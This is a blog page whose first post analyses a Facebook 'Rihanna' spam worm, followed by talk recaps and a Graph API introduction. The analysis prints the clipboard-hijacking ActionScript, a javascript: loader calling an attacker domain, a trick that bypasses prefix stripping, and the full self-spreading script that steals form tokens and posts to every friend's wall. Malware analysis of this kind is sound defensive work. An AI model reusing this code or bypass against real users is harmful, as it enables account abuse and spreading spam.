Analyzing the new “Rihanna” Facebook spam

Some of you might have seen a fast-spreading spam on Facebook named “Rihanna” (after the popular singer/recording artist), as in the screenshot. We have been seeing several spam messages on Facebook these days, and this appears to be yet another social engineering trick by spammers.

However, the speed at which it is spreading says a lot about the success rate of the spam, and to its credit, this “wall flooding” spam offers some interesting technical lessons.

1. It is not based on clickjacking, although the non-clickable video icon is misleading.

2. Unlike many spam campaigns, this one does not leave facebook.com for a new domain. It spreads through Facebook pages themselves, which makes it convincing.

3. It convincingly lures the user into pasting code into the browser’s address bar (old wine in a new bottle).

Overview: On clicking the spam post (the link is in the above screenshot), the user is redirected to the attacker’s Facebook page, as shown in the screenshots below. Initially a YouTube-like video appears (this is a “.swf” file, which plays the key role). After a few seconds it changes itself into a “security check” text with a “continue” button, as in the picture. On clicking the “continue” button, three convincing instructions appear, after which a malicious JavaScript is injected into the active window. The injected script posts the above message and obscene images on the walls of ALL friends of the user!


Technical details:

Once the user follows all the instructions, the JavaScript snippet shown below is injected into the browser; its “src” attribute points to the actual malicious .js file (the URL is masked in the screenshot and in the snippet). In fact, this is a commonly used technique for creating bookmarklets and adding them to your browser’s bookmarks toolbar. When it is used maliciously to lure users into performing an undesirable action, it is referred to as a “socially engineered XSS attack”.

javascript:(a=(b=document).createElement('script')).src='http://free-xx-xx.info/rihh.js',b.body.appendChild(a);void(0)

This .js file has the logic for doing all the harm, but that is not the end of the story. The unanswered questions are: how did this script get into the user’s clipboard? The user never copied any code snippet manually, and the browser sandbox model does not allow cross-domain JavaScript to access the clipboard without explicit permission. And why the curious instruction “Press J on your keyboard”?

1. On analyzing the source of the above Facebook page using browser developer toolbars (IE Developer Toolbar, Firebug, etc.), one can see an iframe that points to the attacker’s external website (the attacker appears to maintain several malicious domains).

2. Inspecting the source of the attacker’s external web page shows that it embeds a Flash (.swf) file which mimics a genuine YouTube video.

3. Going a step further, inspecting the source of this “.swf” file (using one of the online Flash decompilers) gives the code which does the actual harm! It has a timer which changes the YouTube-like image to the security check screen. On clicking the “continue” button, the ActionScript below is triggered, which simply writes text into the clipboard.

// This is the ActionScript code from the attacker's ".swf" file (URL masked).
on (release) {
    System.setClipboard("avascript:(a=(b=document).createElement('script')).src='http://free-xx-xx.info/rihh.js',b.body.appendChild(a);void(0)");
    _root.play();
}

Notice the first word of the text being written to the clipboard: “avascript:”. It is NOT a typo. It should be “javascript:”, but the letter “j” is omitted for a rather compelling reason!

“JavaScript:” prefix and modern browsers:

Much to the annoyance of spammers, modern browsers implemented a little-known but very interesting security feature. Any code with a “javascript:” prefix pasted into the address bar gets the prefix stripped off, thereby preventing script execution. Internet Explorer 9 pioneered this, and other browser vendors have recently come up with their own implementations.

//Copy this JavaScript snippet, open IE9 and paste in address bar.
//You will notice that the "javascript:" prefix will be magically stripped off!
javascript:alert('foo');

Coming back to the “.swf” file: to bypass this browser defense in some popular browsers, the letter “j” of “javascript” is omitted when the script is written to the clipboard. The spammers then cleverly ask users to first press the letter “J”, then press Ctrl+V and hit Enter. This completes the full snippet with the “javascript:” prefix, thereby bypassing the prefix stripping. Isn’t this smart? Although this extra step could be expected to reduce the attack’s success rate, it somewhat increased users’ curiosity.

NOTE: Internet Explorer 9 does not even allow combinations like typing "j" and then pasting "avascript:alert('hi');" into the address bar. So this attack fails in IE9! Yay!!

Chrome 16.0.912.41 on my machine strips the "javascript:" prefix when "javascript:alert('hi');" is pasted directly, but allows typing "j" and then pasting "avascript:alert('hi');".
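To make the difference between the two defenses concrete, here is an added model (not code from the original post or from any browser) of the address-bar behaviour described above: a paste-time check that inspects only the pasted text, versus a commit-time check that inspects whatever is in the bar when Enter is pressed. The regex used to recognise the scheme, the function names and the placeholder host are assumptions of this example.

```javascript
// Added example: models address-bar "javascript:" handling as described in the
// post. Not browser code; the scheme regex and the two-stage model are assumptions.

// How we assume the browser recognises the scheme: optional leading whitespace,
// case-insensitive "javascript:".
const JS_SCHEME = /^\s*javascript:/i;

// Paste-time stripping: the browser only sees the clipboard text and removes a
// leading scheme from it before appending to what the user has already typed.
function applyPasteTimeStripping(typedSoFar, clipboardText) {
  return typedSoFar + clipboardText.replace(JS_SCHEME, "");
}

// What happens on Enter. With paste-time stripping alone, any javascript: URL
// that reached the bar runs. With a commit-time check (IE9, as described in the
// post), the final text is inspected and the script is refused.
function pressEnter(addressBar, { commitTimeCheck }) {
  const isScript = JS_SCHEME.test(addressBar);
  if (!isScript) return "navigate"; // ordinary URL or search, not a script
  return commitTimeCheck ? "blocked" : "execute";
}

// Run one user action: type a prefix, paste the clipboard, press Enter.
function runScenario(typedPrefix, clipboardText, options) {
  const addressBar = applyPasteTimeStripping(typedPrefix, clipboardText);
  return { addressBar, outcome: pressEnter(addressBar, options) };
}

// Constructed sample in the shape of the post's snippet; example.invalid is a
// placeholder for the masked attacker host.
const PAYLOAD_FULL =
  "javascript:(a=(b=document).createElement('script')).src='http://example.invalid/rihh.js',b.body.appendChild(a);void(0)";
const PAYLOAD_NO_J = PAYLOAD_FULL.slice(1); // "avascript:..." as written to the clipboard

// Direct paste: paste-time stripping removes the scheme, nothing executes.
// "J" then paste: the pasted text carries no scheme, so only a commit-time check
// sees the rebuilt "javascript:" URL.
```

The detection lesson is the one the post draws: a check that looks only at the pasted fragment is defeated by splitting the prefix across a keystroke and a paste, whereas a check on the final address-bar contents is not.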

For the curious, here is the entire JavaScript code injected by the attack. It executes in the context of the user’s Facebook window with full privileges!

var post_form_id = document['getElementsByName']('post_form_id')[0]['value'];
var fb_dtsg = document['getElementsByName']('fb_dtsg')[0]['value'];
var user_id = document['cookie']['match'](document['cookie']['match'](/c_user=(\d+)/)[1]);
var httpwp = new XMLHttpRequest();
var urlwp = '/ajax/profile/composer.php?__a=1';
var paramswp = 'post_form_id=' + post_form_id + '&fb_dtsg=' + fb_dtsg + '&xhpc_composerid=u3bbpq_21&xhpc_targetid=' + user_id + '&xhpc_context=profile&xhpc_location=&xhpc_fbx=1&xhpc_timeline=&xhpc_ismeta=1&xhpc_message_text=HEY%20CHECK%20THIS%20OUT&xhpc_message=HEY%20CHECK%20THIS%20OUT&aktion=post&app_id=2309869772&attachment[params][0]=156861974410959&attachment[type]=18&composertags_place=&composertags_place_name=&composer_predicted_city=102186159822587&composer_session_id=1320586865&is_explicit_place=&audience[0][value]=80&composertags_city=&disable_location_sharing=false&nctr[_mod]=pagelet_wall&lsd&post_form_id_source=AsyncRequest&__user=' + user_id + '';
httpwp['open']('POST', urlwp, true);
httpwp['setRequestHeader']('Content-type', 'application/x-www-form-urlencoded');
httpwp['setRequestHeader']('Content-length', paramswp['length']);
httpwp['setRequestHeader']('Connection', 'keep-alive');
httpwp['send'](paramswp);
var friends = new Array();
gf = new XMLHttpRequest();
gf['open']('GET', '/ajax/typeahead/first_degree.php?__a=1&viewer=' + user_id + '&token' + Math['random']() + '&filter[0]=user&options[0]=friends_only', false);
gf['send']();
if (gf['readyState'] != 4) {} else {
data = eval('(' + gf['responseText']['substr'](9) + ')');
if (data['error']) {} else {
friends = data['payload']['entries']['sort'](function (_0x93dax8, _0x93dax9) {
return _0x93dax8['index'] - _0x93dax9['index'];
});
};
};
for (var i = 0; i < friends['length']; i++) {
var httpwp = new XMLHttpRequest();
var urlwp = '/ajax/profile/composer.php?__a=1';
var paramswp = 'post_form_id=' + post_form_id + '&fb_dtsg=' + fb_dtsg + '&xhpc_composerid=u2qr0v_15&xhpc_targetid=' + friends[i]['uid'] + '&xhpc_context=profile&xhpc_location=&xhpc_fbx=1&xhpc_timeline=&xhpc_ismeta=1&xhpc_message_text=Oh%20my%20god%2Ccheck%20this&xhpc_message=Oh%20my%20god%2Ccheck%20this&aktion=post&app_id=2309869772&attachment[params][0]=156861974410959&attachment[type]=18&composertags_place=&composertags_place_name=&composer_predicted_city=102186159822587&composer_session_id=1320585896&is_explicit_place=&audience[0][value]=80&composertags_city=&disable_location_sharing=false&nctr[_mod]=pagelet_wall&lsd&post_form_id_source=AsyncRequest&__user=' + user_id + '&';
httpwp['open']('POST', urlwp, true);
httpwp['setRequestHeader']('Content-type', 'application/x-www-form-urlencoded');
httpwp['setRequestHeader']('Content-length', paramswp['length']);
httpwp['setRequestHeader']('Connection', 'keep-alive');
httpwp['onreadystatechange'] = function () {
if (httpwp['readyState'] == 4 && httpwp['status'] == 200) {};
};
httpwp['send'](paramswp);
};
document['getElementById']('contentArea')['innerHTML'] = '<center><br><br><br><br><br><img src="http://www.hindustantimes.com/images/loading_gif.gif" /><br />Please wait...</center>';
setTimeout('top.location=\'http://free-xx-xx.info/play-video.php\';', 20000);

There are several variants of this spam living at different URLs on Facebook pages. Facebook has been blocking these variants one by one, and by the time of writing this post even the URL in the picture is blocked.

Hope this article helped in understanding how spammers think and gave a feel for the damage that simple games/apps on the web can do if you are not careful. Do share this with your friends and increase awareness.

Happy & secure browsing :)

It is this easy to steal your click! - DevCon 2011

The memories of DevCon 2010, where I presented on “Facebook Apps Development”, are still fresh in my mind, and DevCon 2011 is back! This time I presented on “Clickjacking”, one of the popular modern web-based attacks, with which an attacker can steal a user’s click. The session is heavily inspired by the research done by the Stanford Security Lab and the Internet Explorer team. It focuses on explaining how users fall prey to clickjacking attacks and what care web developers should take to defend against them.

The event, organized by Microsoft User Group Hyderabad (MUGH), had an audience of more than 300 and was held at the Microsoft Hyderabad campus.


Presentation: check Slideshare

Demos source code: check GitHub

There were several interesting sessions by speakers on cutting-edge topics such as Windows Azure, ASP.NET MVC3, Bringing HTML5 experiences to ASP.NET websites, Patterns & Practices in C#, SharePoint 2010, SQL Server Denali and Knotting Windows Phone 7, Azure & Kinect. The audience was very enthusiastic and interactive, which made the sessions lively. It was nice to meet several techies at the event. The learning I had while preparing for this session and answering Q&A was huge :)

Integrating Social Networks with ASP.NET - Virtual Tech Days 2010

Happy to say that I presented at Virtual Tech Days 2010 on "Integrating Social Networks with ASP.NET" in the Developer track. It was a 3-day online technical event (Nov 22-24, 2010) with ~75 sessions from 55 industry experts on Microsoft technologies.

My presentation: Click here

Demos: Click here

The sessions were scheduled for Developer and IT Pro folks, spanning Web Development, Windows Client Development, Database and BI Development, Windows Client, Online Services, Security, Rich Web Experiences, SharePoint 2010, Windows Azure, Datacenter, Database Administration, Interoperability with Microsoft Technologies and Hands-On Labs. In case you missed the event online, you can download the presentations and videos from the site shortly.

Though I could not meet developers in person, I enjoyed presenting a demo-filled session, which I hope will be useful for developers getting started with social networking APIs in their ASP.NET websites. If you didn't get a chance to ask questions during the session, you can always tweet me.

So what next? Microsoft Community Tech Days is coming on December 18th, 2010. The venue is the Microsoft Hyderabad campus. I've seen lots of hot topics being prepared by community folks! Don't miss it!!

Happy programming :)

Programming the Social Web with Facebook's Open Graph API

A couple of weeks back I presented on Facebook Apps Development at DevCon 2010, and it was nice to see the overwhelming response. In this article, I shall throw light on Facebook's new social features, to help developers get started with Facebook app development.

The Facebook F8 conference is a yearly event hosted by Facebook to bring developers and entrepreneurs together to build the social web. With the previous events having announced the Social Graph and Facebook Connect, the 2010 F8 (21st April, 2010) had big news for the evolution of the social web, briefly:

  • The Graph API
  • OAuth 2.0 based authorization
  • Social plugins
  • The Open Graph protocol.

The Graph API, which is the core of the Facebook Platform, gives developers the power to share and make the web more open and connected. Mark Zuckerberg, founder of Facebook, coined the term "Social Graph", meaning "the global mapping of everybody and how they're related". By definition, the social graph is composed of objects (people, pages, events, communities, photos, etc.) and the connections (relationship, tagging, grouping, etc.) between them. Every object in the graph has a unique ID by which it can be referenced.

Technically speaking, Facebook offers a REST-based service that can be used to query any object in the graph.

e.g., To get public info about Bill Gates on Facebook, click the following link: https://graph.facebook.com/billgates.

[Note: When you click the above link, the query returns JSON output containing data about the requested object. IE will ask to download the output, which can be opened in Notepad, whereas Firefox/Chrome/Safari will open it directly in a new tab.]

Similarly, you can get info about the recent Microsoft PDC as: http://graph.facebook.com/MicrosoftPDC. You can even introspect a bit deep and get additional info as: http://graph.facebook.com/MicrosoftPDC?metadata=1

Notice that in the above cases we are retrieving only public info. To get private info, you need to be authenticated by Facebook and append an "access_token" parameter to the query string, like: https://graph.facebook.com/microsoftpdc/feed?access_token=xxxxxxxxxxxxxxx.

To see how it works, log in to facebook.com and then open http://developers.facebook.com/docs/api in a new tab. Scroll down to the connections section and click on any connection like "Friends", "News Feed", "Profile feed", etc. The URL looks like this: https://graph.facebook.com/me/friends?access_token='A set of random characters which FB gives you after authentication'. You will be able to see complete private information, which is not available without authentication.

OAuth 2.0 is the new authorization mechanism used by Facebook. It is an open protocol that allows secure API authorization without the need to enter credentials (passwords). It relies on the exchange of tokens instead of credentials and is more secure.

In layman's terms, when you add applications like FarmVille, you get a confirmation box with "Allow/Deny" buttons. When you click the "Allow" button, the application is added to your graph. Behind the scenes, the app uses OAuth to authorize you via an exchange of tokens. More about it in my upcoming article.

Social Plugins are extensions of Facebook which can be embedded in your websites, creating social experiences. The famous "Like" button, the login button, recommendations, etc. are some of the social plugins. They can be embedded into any existing site using FBML and the Facebook JavaScript API. The official reference is clearly the best guide for learning about the social plugins.

The Open Graph Protocol helps turn your web pages into more meaningful objects in the social graph (Did I say something similar about social plugins too? Wait, there is more to say).

By adding a Like button, you only add a link to your page in Facebook's social graph, which carries no other information. But by adding the <meta> tags of the Open Graph protocol to your web page's header, you share more semantic data about your web page, such as the title of the content, the type of content, a description, an image, etc. Since the protocol is open, these tags can be read by Facebook (or any other network in future) to provide more meaningful information to users.
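As an added example (not code from the original article), here is a small round trip over those Open Graph tags: rendering the <meta> tags for a page's head and reading them back the way a crawler would, then checking that the four properties the protocol marks as required (og:title, og:type, og:image, og:url) are all present. The sample page values are constructed and example.invalid is a placeholder host.

```javascript
// Added example: build and parse Open Graph <meta> tags. Sample values are constructed.
const OG_REQUIRED = ["og:title", "og:type", "og:image", "og:url"]; // required by the OGP spec

// Minimal attribute escaping so content with quotes or ampersands stays well-formed.
function escapeAttr(v) {
  return String(v).replace(/&/g, "&amp;").replace(/"/g, "&quot;");
}
function unescapeAttr(v) {
  return v.replace(/&quot;/g, '"').replace(/&amp;/g, "&");
}

// Turn {title, type, image, url, description} into the <meta> tags for <head>.
function renderOpenGraphTags(props) {
  return Object.entries(props)
    .map(([k, v]) => `<meta property="og:${k}" content="${escapeAttr(v)}" />`)
    .join("\n");
}

// Extract og:* properties from an HTML string, as a reader of the protocol
// would. Both attribute orders are accepted; a repeated property (several
// og:image tags, say) is not modelled here, the last one simply wins.
function parseOpenGraphTags(html) {
  const re = /<meta\s+(?:property="(og:[^"]+)"\s+content="([^"]*)"|content="([^"]*)"\s+property="(og:[^"]+)")[^>]*>/gi;
  const out = {};
  let m;
  while ((m = re.exec(html)) !== null) {
    out[m[1] || m[4]] = unescapeAttr(m[1] ? m[2] : m[3]);
  }
  return out;
}

// Required properties the page is missing; an empty array means it is complete.
function missingRequiredTags(html) {
  const found = parseOpenGraphTags(html);
  return OG_REQUIRED.filter((p) => !(p in found));
}

// Constructed sample head for a blog post like this one.
const SAMPLE_HEAD = renderOpenGraphTags({
  title: 'DevCon 2010: "Facebook Apps Development"',
  type: "article",
  image: "http://example.invalid/devcon.png",
  url: "http://example.invalid/devcon-2010",
  description: "Session notes & demo app",
});
```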

So, by using the Graph API, OAuth, social plugins and the Open Graph Protocol, you can fetch data about any object in the social graph, present it in a semantic way and provide social experiences to the 500 million (and growing) Facebook users on your site!

In my upcoming articles, I shall write in depth about each of these, explaining with code how they work.

Happy Coding :)

Facebook Apps Development - DevCon 2010

Happy to say that I presented at DevCon 2010 on "Facebook Apps Development for web devs" at Microsoft Hyderabad. The event, organized by Microsoft User Group Hyderabad (MUGH), had an audience of 250+ across the Developer and IT Pro tracks! The highlight of the event was the session given by the talented Aaron Skonnard, CEO of Pluralsight!


Presentation: Click here

Demo Facebook App: Click here

Met several geeks and hackers at the event and made good techie friends. Having a chat with Aaron, attending his live session and having him in my session was really awesome! It was difficult trying to explain Facebook OAuth in the stipulated time, but I'll surely blog about it with good demos very soon. Hope the audience had a great time!